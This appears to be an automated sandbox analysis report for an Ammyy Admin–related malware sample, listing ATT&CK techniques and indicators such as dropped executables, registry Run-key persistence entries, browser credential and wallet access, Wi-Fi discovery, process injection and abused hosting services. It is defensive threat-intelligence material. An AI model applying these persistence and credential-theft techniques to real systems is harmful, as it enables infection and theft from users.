ammyyadmin | 4e5cc8cb98584335400d00f0a0803c3e0202761f3fbe50bcab3858a80df255e1

System Information Discovery

defense_evasion privilege_escalation

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation	python-installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation	Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation	Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation	PORNHU~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation	XClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation	._cache_Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation	pornhub_downloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation	._cache_Synaptics.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3024	cmd.exe
6648	powershell.exe

Executes dropped EXE 26 IoCs

pid	Process
2672	._cache_Synaptics.exe
4528	Synaptics.exe
628	._cache_Synaptics.exe
1996	NVIDIA.exe
3568	pornhub_downloader.exe
2316	PORNHU~1.EXE
5908	XClient.exe
6036	loader.exe
6004	phost.exe
2624	phost.exe
5320	Ammyy.exe
5396	Ammyy.exe
5408	Ammyy.exe
4056	python-installer.exe
5176	python-installer.exe
4240	python-3.10.0rc2-amd64.exe
6992	rar.exe
6260	Desktop Window Manager.exe
4848	jrockekcurje.exe
2936	svc.exe
3648	PrivacyPolicy.exe
3692	PrivacyPolicy.tmp
3480	BootstrapperNew.exe
6076	Rar.exe
2264	Desktop Window Manager.exe
5476	Autoupdate.exe

Loads dropped DLL 19 IoCs

pid	Process
4528	Synaptics.exe
4528	Synaptics.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
2624	phost.exe
5176	python-installer.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e1rgfodk.3xy\\NVIDIA.exe"	NVIDIA.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\NVIDIA.exe"	NVIDIA.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	loader.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Desktop Window Manager = "C:\\ProgramData\\Desktop Window Manager.exe"	XClient.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	Synaptics.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\n52tc1fz.jmj\\NVIDIA.exe"	NVIDIA.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\n52tc1fz.jmj\\NVIDIA.exe"	NVIDIA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\e1rgfodk.3xy\\NVIDIA.exe"	NVIDIA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fttlu2ul.hrx\\NVIDIA.exe"	NVIDIA.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fttlu2ul.hrx\\NVIDIA.exe"	NVIDIA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NVIDIA = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\NVIDIA.exe"	NVIDIA.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
153	discord.com
11	raw.githubusercontent.com
12	raw.githubusercontent.com
101	raw.githubusercontent.com
151	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
118	ip-api.com
149	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	Ammyy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	Ammyy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	Ammyy.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	Ammyy.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
5528	tasklist.exe
6832	tasklist.exe
6424	tasklist.exe
4564	tasklist.exe
4908	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ccc-450.dat	upx
behavioral2/memory/2624-454-0x00007FFBB5330000-0x00007FFBB5A00000-memory.dmp	upx
behavioral2/files/0x0007000000023cca-477.dat	upx
behavioral2/memory/2624-494-0x00007FFBEC920000-0x00007FFBEC92F000-memory.dmp	upx
behavioral2/memory/2624-493-0x00007FFBD1A10000-0x00007FFBD1A35000-memory.dmp	upx
behavioral2/files/0x0007000000023cc5-492.dat	upx
behavioral2/files/0x0007000000023cc4-491.dat	upx
behavioral2/files/0x0007000000023cc3-490.dat	upx
behavioral2/files/0x0007000000023cc2-489.dat	upx
behavioral2/files/0x0007000000023cc1-488.dat	upx
behavioral2/files/0x0007000000023cc0-487.dat	upx
behavioral2/memory/2624-499-0x00007FFBCEA50000-0x00007FFBCEA7D000-memory.dmp	upx
behavioral2/memory/2624-500-0x00007FFBDF340000-0x00007FFBDF355000-memory.dmp	upx
behavioral2/files/0x0007000000023cbe-486.dat	upx
behavioral2/files/0x0007000000023cd1-485.dat	upx
behavioral2/files/0x0007000000023cd0-484.dat	upx
behavioral2/files/0x0007000000023ccf-483.dat	upx
behavioral2/files/0x0007000000023ccb-480.dat	upx
behavioral2/files/0x0007000000023cc9-479.dat	upx
behavioral2/files/0x0007000000023cbf-475.dat	upx
behavioral2/memory/2624-501-0x00007FFBB4C90000-0x00007FFBB51B2000-memory.dmp	upx
behavioral2/memory/2624-505-0x00007FFBEBB90000-0x00007FFBEBBB4000-memory.dmp	upx
behavioral2/memory/2624-504-0x00007FFBECB00000-0x00007FFBECB19000-memory.dmp	upx
behavioral2/memory/2624-506-0x00007FFBCCC90000-0x00007FFBCCE07000-memory.dmp	upx
behavioral2/memory/2624-527-0x00007FFBE1C30000-0x00007FFBE1C63000-memory.dmp	upx
behavioral2/memory/2624-528-0x00007FFBCEAD0000-0x00007FFBCEB9D000-memory.dmp	upx
behavioral2/memory/2624-526-0x00007FFBD1A10000-0x00007FFBD1A35000-memory.dmp	upx
behavioral2/memory/2624-530-0x00007FFBDF340000-0x00007FFBDF355000-memory.dmp	upx
behavioral2/memory/2624-532-0x00007FFBCE8B0000-0x00007FFBCE9CB000-memory.dmp	upx
behavioral2/memory/2624-531-0x00007FFBB4C90000-0x00007FFBB51B2000-memory.dmp	upx
behavioral2/memory/2624-529-0x00007FFBF19C0000-0x00007FFBF19CD000-memory.dmp	upx
behavioral2/memory/2624-525-0x00007FFBEBB80000-0x00007FFBEBB8D000-memory.dmp	upx
behavioral2/memory/2624-524-0x00007FFBE8950000-0x00007FFBE8969000-memory.dmp	upx
behavioral2/memory/2624-523-0x00007FFBB5330000-0x00007FFBB5A00000-memory.dmp	upx
behavioral2/memory/2624-668-0x00007FFBCCC90000-0x00007FFBCCE07000-memory.dmp	upx
behavioral2/memory/2624-667-0x00007FFBEBB90000-0x00007FFBEBBB4000-memory.dmp	upx
behavioral2/memory/2624-773-0x00007FFBB5330000-0x00007FFBB5A00000-memory.dmp	upx
behavioral2/memory/2624-788-0x00007FFBE1C30000-0x00007FFBE1C63000-memory.dmp	upx
behavioral2/memory/2624-785-0x00007FFBCEAD0000-0x00007FFBCEB9D000-memory.dmp	upx
behavioral2/memory/2624-781-0x00007FFBCCC90000-0x00007FFBCCE07000-memory.dmp	upx
behavioral2/memory/2624-778-0x00007FFBB4C90000-0x00007FFBB51B2000-memory.dmp	upx
behavioral2/memory/2624-774-0x00007FFBD1A10000-0x00007FFBD1A35000-memory.dmp	upx
behavioral2/memory/2624-849-0x00007FFBB5330000-0x00007FFBB5A00000-memory.dmp	upx
behavioral2/memory/2624-857-0x00007FFBCCC90000-0x00007FFBCCE07000-memory.dmp	upx
behavioral2/memory/2624-873-0x00007FFBE8950000-0x00007FFBE8969000-memory.dmp	upx
behavioral2/memory/2624-872-0x00007FFBE1C30000-0x00007FFBE1C63000-memory.dmp	upx
behavioral2/memory/2624-871-0x00007FFBB4C90000-0x00007FFBB51B2000-memory.dmp	upx
behavioral2/memory/2624-870-0x00007FFBECB00000-0x00007FFBECB19000-memory.dmp	upx
behavioral2/memory/2624-869-0x00007FFBEBB90000-0x00007FFBEBBB4000-memory.dmp	upx
behavioral2/memory/2624-868-0x00007FFBDF340000-0x00007FFBDF355000-memory.dmp	upx
behavioral2/memory/2624-867-0x00007FFBCEA50000-0x00007FFBCEA7D000-memory.dmp	upx
behavioral2/memory/2624-866-0x00007FFBEC920000-0x00007FFBEC92F000-memory.dmp	upx
behavioral2/memory/2624-865-0x00007FFBD1A10000-0x00007FFBD1A35000-memory.dmp	upx
behavioral2/memory/2624-864-0x00007FFBEBB80000-0x00007FFBEBB8D000-memory.dmp	upx
behavioral2/memory/2624-863-0x00007FFBCE8B0000-0x00007FFBCE9CB000-memory.dmp	upx
behavioral2/memory/2624-862-0x00007FFBF19C0000-0x00007FFBF19CD000-memory.dmp	upx
behavioral2/memory/2624-861-0x00007FFBCEAD0000-0x00007FFBCEB9D000-memory.dmp	upx

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

Create Process with Token

T1134.002

pid	Process
2844	mshta.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
6708	2936	WerFault.exe	347

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ammyy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ammyy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ammyy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-3.10.0rc2-amd64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pornhub_downloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PORNHU~1.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrivacyPolicy.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PrivacyPolicy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	._cache_Synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jrockekcurje.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
6156	cmd.exe
6656	netsh.exe

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svc.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	svc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a1836637d9f186360000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a18366370000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a1836637000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da1836637000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a183663700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

pid	Process
6044	WMIC.exe
3028	WMIC.exe
2012	WMIC.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
6852	systeminfo.exe

Kills process with taskkill 18 IoCs

defense_evasion

pid	Process
7140	taskkill.exe
5508	taskkill.exe
6868	taskkill.exe
3884	taskkill.exe
6532	taskkill.exe
6952	taskkill.exe
5772	taskkill.exe
6816	taskkill.exe
7068	taskkill.exe
5320	taskkill.exe
5368	taskkill.exe
4144	taskkill.exe
2728	taskkill.exe
3652	taskkill.exe
6000	taskkill.exe
5388	taskkill.exe
7124	taskkill.exe
6192	taskkill.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Ammyy	Ammyy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin	Ammyy.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr = 537d567366087c6658524c17525384173d84c22bb36b	Ammyy.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	Ammyy.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	Ammyy.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	Ammyy.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin	Ammyy.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE	Ammyy.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = 8cbd6e69b408052bf3afc6021cb55420ba813420e4d6c116ecc034f7904ab1c81553c217c4da63d1a1672aeb57c0ed2405b3be19952726c3ea7e49c8e5a967332581ad8f079d320ce70ca1	Ammyy.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3176	schtasks.exe
6584	schtasks.exe
4584	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3164	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 53 IoCs

pid	Process
448	powershell.exe
448	powershell.exe
448	powershell.exe
2032	msedge.exe
2032	msedge.exe
1536	msedge.exe
1536	msedge.exe
5208	identity_helper.exe
5208	identity_helper.exe
6120	powershell.exe
6120	powershell.exe
6120	powershell.exe
2324	powershell.exe
2324	powershell.exe
5856	powershell.exe
5856	powershell.exe
2324	powershell.exe
5856	powershell.exe
1808	powershell.exe
1808	powershell.exe
1808	powershell.exe
5744	powershell.exe
5744	powershell.exe
5744	powershell.exe
2936	powershell.exe
2936	powershell.exe
2936	powershell.exe
2936	powershell.exe
6648	powershell.exe
6648	powershell.exe
6716	powershell.exe
6716	powershell.exe
6844	powershell.exe
6844	powershell.exe
6648	powershell.exe
6844	powershell.exe
6716	powershell.exe
6824	powershell.exe
6824	powershell.exe
6824	powershell.exe
5148	powershell.exe
5148	powershell.exe
5148	powershell.exe
7000	powershell.exe
7000	powershell.exe
7000	powershell.exe
3156	powershell.exe
3156	powershell.exe
3156	powershell.exe
5476	Autoupdate.exe
5476	Autoupdate.exe
5476	Autoupdate.exe
5476	Autoupdate.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2672	._cache_Synaptics.exe
Token: SeDebugPrivilege	628	._cache_Synaptics.exe
Token: SeDebugPrivilege	448	powershell.exe
Token: SeDebugPrivilege	5908	XClient.exe
Token: SeIncreaseQuotaPrivilege	4024	WMIC.exe
Token: SeSecurityPrivilege	4024	WMIC.exe
Token: SeTakeOwnershipPrivilege	4024	WMIC.exe
Token: SeLoadDriverPrivilege	4024	WMIC.exe
Token: SeSystemProfilePrivilege	4024	WMIC.exe
Token: SeSystemtimePrivilege	4024	WMIC.exe
Token: SeProfSingleProcessPrivilege	4024	WMIC.exe
Token: SeIncBasePriorityPrivilege	4024	WMIC.exe
Token: SeCreatePagefilePrivilege	4024	WMIC.exe
Token: SeBackupPrivilege	4024	WMIC.exe
Token: SeRestorePrivilege	4024	WMIC.exe
Token: SeShutdownPrivilege	4024	WMIC.exe
Token: SeDebugPrivilege	4024	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4024	WMIC.exe
Token: SeRemoteShutdownPrivilege	4024	WMIC.exe
Token: SeUndockPrivilege	4024	WMIC.exe
Token: SeManageVolumePrivilege	4024	WMIC.exe
Token: 33	4024	WMIC.exe
Token: 34	4024	WMIC.exe
Token: 35	4024	WMIC.exe
Token: 36	4024	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4024	WMIC.exe
Token: SeSecurityPrivilege	4024	WMIC.exe
Token: SeTakeOwnershipPrivilege	4024	WMIC.exe
Token: SeLoadDriverPrivilege	4024	WMIC.exe
Token: SeSystemProfilePrivilege	4024	WMIC.exe
Token: SeSystemtimePrivilege	4024	WMIC.exe
Token: SeProfSingleProcessPrivilege	4024	WMIC.exe
Token: SeIncBasePriorityPrivilege	4024	WMIC.exe
Token: SeCreatePagefilePrivilege	4024	WMIC.exe
Token: SeBackupPrivilege	4024	WMIC.exe
Token: SeRestorePrivilege	4024	WMIC.exe
Token: SeShutdownPrivilege	4024	WMIC.exe
Token: SeDebugPrivilege	4024	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4024	WMIC.exe
Token: SeRemoteShutdownPrivilege	4024	WMIC.exe
Token: SeUndockPrivilege	4024	WMIC.exe
Token: SeManageVolumePrivilege	4024	WMIC.exe
Token: 33	4024	WMIC.exe
Token: 34	4024	WMIC.exe
Token: 35	4024	WMIC.exe
Token: 36	4024	WMIC.exe
Token: SeDebugPrivilege	6120	powershell.exe
Token: SeDebugPrivilege	4564	tasklist.exe
Token: SeIncreaseQuotaPrivilege	5796	WMIC.exe
Token: SeSecurityPrivilege	5796	WMIC.exe
Token: SeTakeOwnershipPrivilege	5796	WMIC.exe
Token: SeLoadDriverPrivilege	5796	WMIC.exe
Token: SeSystemProfilePrivilege	5796	WMIC.exe
Token: SeSystemtimePrivilege	5796	WMIC.exe
Token: SeProfSingleProcessPrivilege	5796	WMIC.exe
Token: SeIncBasePriorityPrivilege	5796	WMIC.exe
Token: SeCreatePagefilePrivilege	5796	WMIC.exe
Token: SeBackupPrivilege	5796	WMIC.exe
Token: SeRestorePrivilege	5796	WMIC.exe
Token: SeShutdownPrivilege	5796	WMIC.exe
Token: SeDebugPrivilege	5796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5796	WMIC.exe
Token: SeRemoteShutdownPrivilege	5796	WMIC.exe
Token: SeUndockPrivilege	5796	WMIC.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
5408	Ammyy.exe
5176	python-installer.exe

Suspicious use of SendNotifyMessage 25 IoCs

pid	Process
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
1536	msedge.exe
5408	Ammyy.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
3164	EXCEL.EXE
3164	EXCEL.EXE
3164	EXCEL.EXE
3164	EXCEL.EXE
3164	EXCEL.EXE
3164	EXCEL.EXE
4848	jrockekcurje.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4688 wrote to memory of 2672	4688	Synaptics.exe	86
PID 4688 wrote to memory of 2672	4688	Synaptics.exe	86
PID 4688 wrote to memory of 2672	4688	Synaptics.exe	86
PID 4688 wrote to memory of 4528	4688	Synaptics.exe	88
PID 4688 wrote to memory of 4528	4688	Synaptics.exe	88
PID 4688 wrote to memory of 4528	4688	Synaptics.exe	88
PID 4528 wrote to memory of 628	4528	Synaptics.exe	89
PID 4528 wrote to memory of 628	4528	Synaptics.exe	89
PID 4528 wrote to memory of 628	4528	Synaptics.exe	89
PID 628 wrote to memory of 1996	628	._cache_Synaptics.exe	94
PID 628 wrote to memory of 1996	628	._cache_Synaptics.exe	94
PID 628 wrote to memory of 3568	628	._cache_Synaptics.exe	96
PID 628 wrote to memory of 3568	628	._cache_Synaptics.exe	96
PID 628 wrote to memory of 3568	628	._cache_Synaptics.exe	96
PID 3568 wrote to memory of 4384	3568	pornhub_downloader.exe	97
PID 3568 wrote to memory of 4384	3568	pornhub_downloader.exe	97
PID 4384 wrote to memory of 2844	4384	cmd.exe	100
PID 4384 wrote to memory of 2844	4384	cmd.exe	100
